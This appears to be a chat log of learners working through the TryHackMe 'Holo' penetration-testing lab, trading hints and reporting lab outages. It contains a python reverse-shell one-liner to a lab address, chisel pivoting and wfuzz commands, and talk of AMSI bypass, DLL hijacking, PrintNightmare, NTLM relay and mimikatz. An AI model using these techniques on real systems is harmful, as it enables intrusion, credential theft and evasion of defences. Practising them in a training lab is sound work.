While you are knocking down tasks 1-33, just download the recommended VM in the background and run it in VMWare. I did try to qemu-img convert it into KVM but it broke on me for some reason, it went into a automatic repair loop. Probably because I first had to import it into VMWare and then qemu-img convert it from there.

I was doing everything the hard way, because I like KVM and Proxmox so much.

that all makes sense actually thank you and that would be the reason why which wget wasnt working right?

Gave +1 Rep to @cinder notch

should be.

Remember that which checks the $PATH variable for the file that you're looking for, so if it wasn't in the PATH, which will not find it

Im pretty sure i checked the $PATH variable and the path was there but i could be wrong. It was hours ago lol but thanks again. When I get back on it, ill add my own ssh key

I am having trouble running Windows 11 version of the developer VM that was recommended in the THM holo page. All I need is Visual Studio right? Can I use my own Windows 10 VM? Edit: I'll try my CommandoVM install on my Proxmox VE while i'm waiting for VMWare Tools to get this Windows 11 development VM working.

The point of the developer VM is to have something to compile C# Visual Studio projects and modify code to test and evade AV

So do as you please

Fixed. It looks like VMWare Tools needed to be installed. Just like the RedHat VirtIO drivers for Proxmox for Windows machines.

THM staffs, It seems there's an issue with the fileserver. Tried to restart twice but it's not coming back up. 💔 💔 💔

Hope you could check it. Thanks!

Hi, I was working on holo when I suddenly lost connectivity to its network. It looked like the environment "went to sleep" even though I was working on it actively. I started it again (10 minutes ago) but I can't ping or access any machine. I restarted my openvpn connection and even regenerated the package but still no progress. Any clues?

Pinging just gives me a Destination Host Unreachable

Short question regarding Task 29.
The client side filter and the AV are supposed to work right? it is not supposed to accept every file and execute whatever payload i upload
Cos i was able to upload what i wanted, regardless of the file type and the payload got executed like it should.

Someone could have edited the code on the server-side to remove the filter, and then proceeded to disable AV

I'm still struggling on task 9 from last night if anyone has any insights in a direction I need to go I'm a little stuck. every time I run Gobuster I get a 200 on every single item in the list. I have reset the network so its definitely something I am doing. The command I am running is gobuster vhost -u holo.live -w /usr/share/wordlists/dirb/common.txt

I have www.holo.live in the hosts file under the ip 10.200.133.33

check what length each response has. after that you should be able to modify your command so the wrong directories wont appear anymore. Check gobuster help what kind of options you have as the length is just an example from my side

thanks i'll look at that. appreciate it.

Gave +1 Rep to @ocean hare

You are welcome. Let me know if you need further help on that topic

Looks like I did it, couldn't quite figure it out in gobuster but did it in wfuzz and got the following results. ||'''admin and dev'''|| used the following command||''' wfuzz -w /usr/share/wordlists/dirb/common.txt -H "Host: FUZZ.holo.live" -u http://10.200.133.33 --hc 400 --hh 21456`''||

big thanks man

Weird,||i can't login to admin with creds, but could like an hour ago, can still access dev and www||

Hello, im kinda confused on what is going on in the pivoting section. I get how to use chisel and got that running but im stuck on figuring out what is going on with proxychains and getting that to work. I edited the conf file and added socks5 127.0.0.1 1080 but i cant get anything back when i use curl. Ive tried some combinations of my tun0 and localhost with the different ports but nothing.

try clearing your browsers cache

what is your curl command?

..., yep, i just needed to delete a cookie, thank you!

Gave +1 Rep to @ocean hare

ive tried many, with proxychains4 curl http://IP (which is either localhost or my tun0):PORT (either 1080 or 8000) are the variations ive tried

correct me if i am wrong, you are trying:
curl http://127.0.0.1 or curl http://10.111.x.x (which is not the ip from the holo network)

for the second its my ip from the vpn file, not the server ip

From the section "Pivoting":
"To use the proxy, you will need to prepend any commands you want to route through the proxy with proxychains."

you dont want to access something on "your" system. you use chisel so your system knows how to redirect the traffic.
so sending request with proxychains directs to chisel server, the chisel server directs to chisel client which redirects to the target you want to access.

so we want to use proxychains to send a request to the chisel server?

You use proxychains to send your request to the chisel server which is connected to the holo network and you want to access a domain inside this network

it's like telling your terminal what to do with the request.

stuck on Covenant setup for SharpEDRChecker

never used Covenant before

struggling to build it

SharpEDRChecker task

Anyone can help?

Tried Task 47 again where I need to reboot the Fileserver. Same as yesterday, the server didn't come back online.

I tried the easy way, use SharpShooter to make both a js and vbs shellcode runner that bypassees AMSI. Then I modified the suggested PHP executor file to run "cscript.exe" to use the Windows Scripting Host. Didn't seem to work. I'm just gonna stick with the way that THM said in the guide

I bypassed AMSI, got to the next box. Was seatbelt.exe supposed to be in the Downloads directory for the user on PC-FILESRV01? Because all of the sudden I couldn't get the AppLocker Bypass to work. Edit: Nevermind, completed Holo Live.

chisel is available as a ELF binary on Parrot by default. It can run in both server and client mode. You drop chisel on your victim, while running chisel on your attacking machine as a server. Then you chmod +x chisel on the victim and run ./chisel client attackerIP:8000 R:socks to have it connect back to your attacking machine to create a socks5 proxy that dynamically forwards requests and allows you to crackmapexec and xfreerdp to new targets on the network. It's also written in Golang, and while the apt repo's install of chisel doesn't give you the source, you can clone the git repo to cross compile it to have the chisel client run on Windows, Macs, FreeBSD, Linux, Unix machines.

Whats the status of the relay thing?

Fully working

Hey guys can somebody help me with the PC-FILESRV01 Priv-Esc?

I was able to get the chisel server running my issue was with using proxychains to get onto the internal network.

Can someone please help me with AV part, I think I bypassed everything, but can't seem to catch a shell? nvm, i think i got it

So im trying to get convenant up and running but im coming across this issue when i try to run the project with dotnet i get the error Couldn't find a project to run. Ensure a project exists in ./Covenant/Covenant, or pass the path to the project using --project. and this is my command to run it sudo dotnet run --project ./Covenant/Covenant i also followed the steps outlined on this page to install SDK https://dotnet.microsoft.com/en-us/download/dotnet/thank-you/sdk-3.1.416-linux-x64-binaries

Well i think i figured the error above out by running dotnet new console in the project area then when i try to run covenant, im missing a lot of stuff so something mightve went wrong with my installation

All set! (so far). Maybe adding that dotnet new console command to the instructions if others have come across the same issue?

Are you using Kali or Parrot? I installed the dotnet package on Parrot and everything worked fine and followed the instructions to install Covenant on the challenge instructions from github

I am using kali

Sure ! Dm !

does the kavremover have a scheduled task? because i cant get the session back? and with Get-ScheduledTask dont seems kavremover to be one of them

@opal scarab kavremover should be a scheduled task from Admin so you wouldńt see it but on my network i also cant get the kavremover dll hijack to work

thanks, probably someone broke the task

No i also rebooted the whole network no task there but youre welcome to try else you can use another exploit on that server

Do we have some AD Specialists in here who can help me to understand/learn something about TGS?

I am on this Task Task 20 Privilege Escalation Call me Mario, because I got all the bits

When I do this sudo install -m =xs $(which docker) . I aks for www-data password?

I tried the passwords, that I already found

Docker is already installed my friend

hmm I see, I will try a few stuff

can I pm you?

Sure

Could someone possibly dm me about understanding the AV section?

Can anyone help me with holo room

I tried to escalatie privilege in LSRV01 and tried excute docker privesc script from gtfo bins and it is showing 'Unable to find image 'alpine:latest' locally' which works for my friend perfectly well

is the alpine container on the machine?

Check what alpine is. After that you should know what to check to change your command

alpine is not on the machine and cannot be downloaded either with that privilege

Thats correct what else is on the machine that could serve a similar propose as apline?

I wlil check

like jessie, stretch and buster?

Goes in the right direction.
Why does the command you are trying to execute uses "alpine".
Try to find out a bit more about the docker instance running on the system and read the gtfobins entry from the really beginning

Right! Thanks bro. I'll go try again

DM me if you still need help with that part

there is no other image like alpine in the machine too

can i DM you?, because you are getting close and i dont want to include spoilers here

Yesyes

Please

Someone here working on 10.200.132.x?

@lapis crescent Hey were you able to get the dll hijacking to work?

@ocean hare Hey no wasn‘t able to get that working used a workaround

Alright thanks. will keep digging

i have issues connecting to the network

ive downloaded the network configuration file and connected using ovpn

yet im not able to access the machine which i was previously able to

all of a sudden its not responding to any pings or requests

can anyone give me a pointer on how to start to build the AMSI bypass?

I just pwned the host running the docker container (so I escaped the docker, and then privesc to root), is there someone who I can pm so get some insights to fully understand what I'm doing here?

Just google it. Don't overthink it. I tried a few weeks actually to get that to work, just to end up using 3 lines of powershell..

Lol thanks will try....

Gave +1 Rep to @sonic arch

right after a network reset, someone crashed the webserver on the 10.200.108.0 Network, this is getting really old

hey, i cant seem to get the dll hijacking working, i replaced what i think is the correct .dll, put it in what i think is the correct directory but i dont get the callback

is PC FILESRV01 no longer vulnerable to printnightmare or am I doing it wrong?

Hi guys....Quick one...What happens when the days of access left for this network terminate?

Will i have to start from scratch?

room progress does not get reset.

i ended up uh- not even using ps lol
Grunts didn't work so i just went for the simplest thing I could think of- and it worked

netcat ftw!

regarding privesc on FILESRV01,is the admin service not working? (subnet 146)

is there anyone can wote reset for holo , i can't get reverse shell from PC-fFILESERVER01 i guess someone deleted scheduled tasks , so it doesnt' give me reverse shell even i changed dll with my malicious dll , and i coudldn't find that scheduled task work when i checked shcheduled tasks with powershell

yeah same, for subnet 146^

we're at 4/5 anyways so

yeah the admin task is still not running after reset, so maybe i'll try another way to privesc

Hey guys.
Not quite sure how to go ahead with the amsi bypass. I have the bypass ready. I tried running a php script that first runs the bypass code and then execute the reverse shell. Doesn't seem to work. I am not using Covenant for now, just trying to do this manually. Any hints?

Anyone available to help on the file upload portion in task 29?

sure

Voice chat?

sure which room?

medium study.

same 2 you

I don't know why but the dll hijacking won't work for me

Here is how I approached it as the task made assumptions which did not work for me. We know that it is a win box running php. So we can call on php to provide a route for commands (LFI), but at the same time we do know that stock scripts/code are not going to fly so we can obfuscate (<key) some code that could be called by a native command from php.
To be honest this took a few hours of work as I really wanted to avoid a Covenant fiasco but it is certainly achievable without too much trouble but found a win vm to test what would and wouldn't pass amsi invaluable. I hope that helps without giving the game away....

Ah... thanks mate, I'll try this.

Gave +1 Rep to @low tinsel

someone on Holo rn ?

Yes, till a few moments ago, when the network turned out, to be unreachable.. sigh

I am getting this error, when I try to run covenant grunt

I re-installed Convenant, I tried different grunts etc, but all leads to this error

Can anyone access holo rn? The first server is unreachable for me

Same here..

Man... this is happening a lot with Holo on the weekend. Gotta wait for a reset

same happened when I was in the privesc of task 20. Someone started deleting random files with sudo permissions and then the whole thing went down

dll takeover ain't working

sigh

Left the room, rejoined and it worked again... Without reset.

Aaaaaand here we go again, lol...

@sonic arch rip. Thanks though, that seemed to have worked

Gave +1 Rep to @sonic arch

its infuriating how slow it is though. Just getting the first steps out in is frustrating as hell

Is the NTLM-Relay attack supposed to work again?

guys reset?

Yes it does, did it a couple of days ago.

Darnit.. Then I just suck.. lol

I should work if you follow the guide, but it's in the details.

I just started to read into this topic, but the main issue I face atm, is that I can't use rdp to login with the local administrator on the PC-FILESERV01. But via evil-winrm. Does it make a difference if I privesc via PrinterNightmare or now that it's fixed, the dll hijacking?

Uiuiuiuiui.. NVM, found it. Time for epic facepalm..

having trouble with PC-FILESRV01 - creds being rejected - "SPNEGO received NTSTATUS: STATUS_NETLOGON_NOT_STARTED [0xC0000192] from server" threads in this room indicate I am on the right route so have voted for a reset - anything else I can do ?

any help ? for Remote NTLM Relay , i tried more than 6 times reboot machine and try to get shell , but still doesn't come connection

Someone has disabled NetLogon on that server, this is part of the remote NTLM relay. You should still be able to login with the rdesktop RDP client.

any help ?

it looks like ntlmrelayx is having trouble communicating with 10.200.120.30.

i reset 2 times 🙂

reset network in 2 days 🙂 i don't count anymore machine

that doesn't necessarily mean something is wrong with 10.200.120.30

it means there may be something wrong with your pivot

i will check this again

yes you are right 🙂 i was pivoting with chisel before , i could'nt use with ntlmrelayx , this time i use ntlmrelayx with sshutle , it's worked

I uploaded the .php on via the image uploaded, but unable to call the .php to run via http://10.200.114.31/ra.php or also tried with http://10.200.114.31/img/ra.php

Can anyone explain why getting a stable shell on L-SRV01 is so difficult?

Literally nothing works except for nc -c

And pty isn't working at all

I want to move on to the docker stuff but I can't get a usable shell on this box

After some experimenting, this command seems to work (URL encoded)

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.50.112.120",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

But nothing else I've tried does it

I can't get any binary on the system to send a connection, except for netcat and python3 via this one singular command, and I have no idea why

thanks for the reply, today xfreerdp (where the netlogon msg came from) is still not working however remmina is working which it did not yesterday - only issue is that I picked up someone elses rdp session (apologised and handed it back to them) - no route with crackmap or evil-winrm and have tried sshuttle and chisel. guess I will have to wait until I see the network drop due to inactivity so I can grab the rdp session - in the mean time I will have a look at other options on the box

Gave +1 Rep to @solid oasis

10.200.110.x subnet has issues with dll takeover

my subscription ends within few days someone help me out with resets

2/5

anyone free to discuss task 43 (dll highjacking) please?

What's up with task 9 - GoBuster vhost. The website has no specific URL, only an ip address. Does running the scan with the ip address instead of the URL still give results?

No.

So the network seems to have been reset (new ssh host keys) but still having a bit of trouble with PC-FILESRV01. RDP login now has login restrictions applied to it and crackmap now sees .35 but the expected access does not occur but does work for S-SRV01 - is there any other route ?SMB 10.200.123.35 445 PC-FILESRV01 [+] HOLOLIVE\wxxxxx:xxxxxxxxxxxxxxc9 SMB 10.200.123.30 445 DC-SRV01 [+] HOLOLIVE\wxxxxx:xxxxxxxxxxxxxxc9 SMB 10.200.123.31 445 S-SRV01 [+] HOLOLIVE\wxxxxx:xxxxxxxxxxxxxxc9 (Pwn3d!)

who can i msg to confirm something on the holo active directory machine don't wnt to spoil it

Anyone else's Microsoft Edge went berserk too when tried to visit Holo page?

Your AV probably freaked out at seeing the AMSI bypass template code that's displayed in some of the tasks

we've dropped a message in the slack - historically, we've been able to clear some of these things up w/ AV Vendors

😂 😂 😂 😂 😂 😂 😂 😂 😂 😂

Its happening with many boxes out here

You must check pivoting if you are using chisel , try to use sshuttle , my problem was that

Just finished, great journey - kudos to the the creators and those in here helping out. pretty much worked as designed in hindsight but I would treat the steps more as guidelines which is great because it helped think about other options or routes (many did not work for me but they are all skill builders!)

have some questions. can i dm?

sure-if the answer benefits the room e.g. something should of worked but didn't I will put it up for all

can someone help me with dll hijacking

hey bro can i dm? i have some doubts on task 43

Someone who finished with the AMSI bypass can help me to find right resources to solve FILESERV01 privesc ?

I also need help with dll hikacking

Uploaded melicious dll but can't get reverse shell

the first server shut down 😢

thanks to the guy who put threads 100 xD

cool

still finding way to get reverse shell on the windows i have RCE already but can't seems to get a shell back to terminal

cool

i hope throwback have personnal instance because others network are unplayable when a dumb guy is on it..

lol

cant access the admin.holo.live/dashboard.php for the RCE and that's really boring...

the page just hang out since 5min and cant go on the dashboard and im sure im the only one who started this section 😢

let's go to DANTE...

strange work fine on my end

you can access the dashboard?

the login page is okay but when i enter the good creds found previously the page load and load and load and load xD

thanks for your time 😉

yes bro i can

||admin:D*********||??

i will stop the lab and restart

ok bro

yeah with a ! at the end 🙂

thank you for the time you took to check it

yes bro

it cool maybe restart it

Does someone think that from srv01 there is a chance also to pwn the DC ?

And not from filesrv01 ?

I "just" have to root now the filesrv01 and the dc

you are on the right track if you have doubts on q43 - have a look back though the room - there is another totally different approach which just works

🤔🤔🤔

can i dm ?? i'm stuck and can't understand where im going wrong

13/12/2021 posts in this room - works a treat

oh gosh

such a nightmare

10.200.110.x down

🥲🥲

Can anyone help me on task 13? I tried a number of different variations of wfuzz commands, I am not getting anywhere though.

all this networks down every time...

since yesterday admin.holo.live/dashboard cant be accessed...

it is a nightmare but not in a positive way... how to play if i cant access it xD

i tried leave the room and back, nothing...

Have you cleared your cookies?

yeah

i can connect to admin subdomain but cant access the dashboard even with the good creds founds previously

yesterday i had a rev shell on it but must go, and when back i restart the nerwork and cant access the dashboard since that, i tried leave room and back to the room, cleared cookies for THM and admin subdomain etc etc

it is back now

anyway thank you for your time

I had the same issue and clearing your browsers cookies and cache did the trick for me

do you have issue getting shell on the windows host bro??

been on it for 2 days straight now

For 10.200.x.31 or 10.200.x.35?

have RCE on 10.200.x.31 but can't seems to get a reverse shell back to my terminal can i DM to avoid spoiler

@wide aspen are you still working on 10.200.120.x?

No i finished

Just got the DC ntlmv2

Can't crack it 😂

probably pass the hash

Yeah but the machine that runs the responder is pwned by itself

I can't run there ntlmrelayx

So I need to send the hash from the docker machine to my machine for relay and without ntlmrelayx. Im trying to find a solution

what target are u on 10.200.xxx.31??

I'm on 33

Sorry lol didn't know what was that haha

I'll explain u. On 33 I run responder. I get the DC hash. But I can't run there ntlmrelayx because there is not impacket repos there

you know 33 is linux right ??

Yep ofc

So what ?

why not pivot to 31

I already did

Im trying to get the DC from Linux

smooth i get u now

PC-FILESRV01

I pwned SRV1 system, Linux root, and I just have user on filesrv01

watamet??

Yep

Did u pivot on different users ?

I see a lot of users on that AD with power view

when i dump the hash with mimikatz that how i got the hash for watamet

Yeah same for me

lol and that wer am stuck

On AppLocker bypass ?

check DM to avoid spoiler

yo task 43 still cant get the dll to connect anyone know why... is it broken or anything i have done as it should be done

yo could u help me with task 43? its the dll and i have done how its supposed to be (i think) and still dont work

Same

now seems everything is down can't access machines anymore

its insane i tested multible exploits with metasploit all i get is just a meterpreter shell (basic one) and then cant get to escalate my privilege

Hacking is not only about metasploit bro

Actually I'm pretty happy to experiment difficulties with AMSI bypass and AppLocker Bypass because it makes me willing to understand deeper every protocol and defense endpoints

yeah mr. obvius we know that.... but its good place to start and test things out

It doesn't look so obvious for you lol

Anyway I didn't say that to talk bad to u

it is obvius.. but if i have 4 exploits i know and can test in a mater of seconds i might as well

Agree

There is also many false positives from winpeas

Hi, I have some troubles with Task 18: "What user is the database running as?" I have ps output with full user names (not truncated), but the username for mysqld process is not a valid answer (also truncated version of that user is also not valid response). What should I put there?

At that point you have a user shell right? Which you got through the web app

yes, I have, I also have reverse shell from L-SRV01

So you know which user is running the web app right? And you are able to access the database

ok, I got it, I thought it was about the user from which database is started (ps axu | grep mysql)

you thought just a bit too far 😉

Who else got this issue? I am using Convenant. But. somehow getting this error

Guys how to find the application for DLL hijacking? I cannot find it in PEAS outputs or getscheduled task outputs

If someone can reset 124 I'll be happy

Thx bros

And sis

My ntlmrelayx.py is erroring out with "smbclient error : connection was reset" any hints?

In Task 29 the JS filters & AV must have blocked our file upload but i didn't find any issue while uploading the file on the server

Also I got the reverse shell & got the root flag without any issues, which clearly means that AV is disabled, is it intended?

There's nothing stopping someone from turning off AV, and while the network creators have advised against doing that (both from a learning and a courtesy perspective), people do it anyway.

You can run sc query windefend on the Windows machine to check the status of AV.

Also someone might have edited out the client-side filter

is it only for this subnet : 10.200.133.0/24 ?

because in previous messages as well, few of the users posted the same doubt

@lone spruce @final patio

if someone can reset 119 it will be cool

Where do you change the apache conf file to switch to port 8008?

8080*

Is .33 supposed to have an http service running on port :80? The only open port I see is :22 (.95 subnet)

mybad they reset the network 😢

someone can use evil-winrm to connect to PC-FILESRV01???

cant make it work

some help is welcome 🙂

Can anyone confirm on Task 43 there should be a scheduled task set up for non-windows directory app (don't want to give too much away)

@frozen iron I had no success with winrm on that server, no idea why. Could crackmapexec with SMB and RDP. But winrm failed with both password and hash

ok thank you for the help 🙂

Gave +1 Rep to @minor flax

im sure PSRemoting isnt enable, maybe they forgot :p

PS C:\Users\watamet> Test-WSMan -Authentication default
wsmid : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd
ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
ProductVendor : Microsoft Corporation
ProductVersion : OS: 10.0.17763 SP: 0.0 Stack: 3.0

Should be working, but literally no idea

yeah should be 🙂

i literally just waited 15min trying things and it was just the lab time whcih expired xD

ooo, so rebooting it has fixed it?
I think I need a full reset for scheduled tasks to fix, which luckily is tomorrow

nope it doesnt fix it i was trying something else in the same time

Can anyone confirm on Task 43 there should be a scheduled task set up for non-windows directory app (don't want to give too much away)
Without this I don't think I can complete the task, and therefore the further tasks and it's really annoying

Turns out after a reset there still isn't a scheduled task.

i am also cant find sheduled task... vote for reset 147.35

The network got reset and there isn't a scheduled task. I'm utterly baffled

@unreal flicker what do you get if you try and run the application? Trying to see if it's the exact mirror of what's happening to me

it says that only administrator can run the program

Yeah exactly the same as I get.
How annoying! We are so close!

vote vor reseting network, maybe 2-nd time it will help

On different networks sadly.

Is it a room bug maybe? Might be worth reporting?

In task 48 I have sshuttle set up to .33 and can connect to dc01 (checked with smbclient -l). ntlmrelayx says it creates the connection to 445 but then psexec and smbexec both get 127.0.0.1:1080 <-> 10.200.95.30:445 connection denied. I also tried to use psexec -t 10.200.95.35 -c 'path-to-shell.exe' to run a meterpreter shell in the context of srv-admin on filesrv but it doesn't seem like it ever gets run. did anyone solve this task recently that I could compare with?

@trim totem help me with the getting an admin shell on FILESRV01 and I'll do this bit tomorrow and help out.
(See up for the issues with scheduled tasks)

I didn't have the scheduled task either, I just added a new local admin with Print-Nightmare and then you can run a command shell as nt auth/sys to get domain context

Ahhh that's great thinking!! I'll try that tomorrow and do the ntlm relay stuff and try to help out!

^ ended up using ntlmrelayx's interactive mode and that worked

Is anyone stuck on the damn docker image part?

That was miserable

What's your problem @timid moss

Always ask question directly because people generally dont lose time like that ;)

On the amsi bypass part, when i try to bypass amsi form my webshell i cant make it work, someone to help me?

The method to bypass amsi doesnt work for me rn, the first time i just disabled it since i saw i was system but after i see there is a amsi bypass section

It seems the [PSObject] doesnt work

I tried multiple concatenate 1nd PSObject which doesnt work on the webshell

Maybe i will try directly on powershell to see if this is really the webshell who fuck the whole thing

So if someone made it work trhough webshell and can share it on DM

:'(

hi, it seems that .108.35 is missing scheduled task, will network reset restore it?

ah, nevermind, I see that there is another way

thanks for the help xD

when you close the smb port wer u able to access RDP still??

it seems nobody made the amsi bypass xD

anyway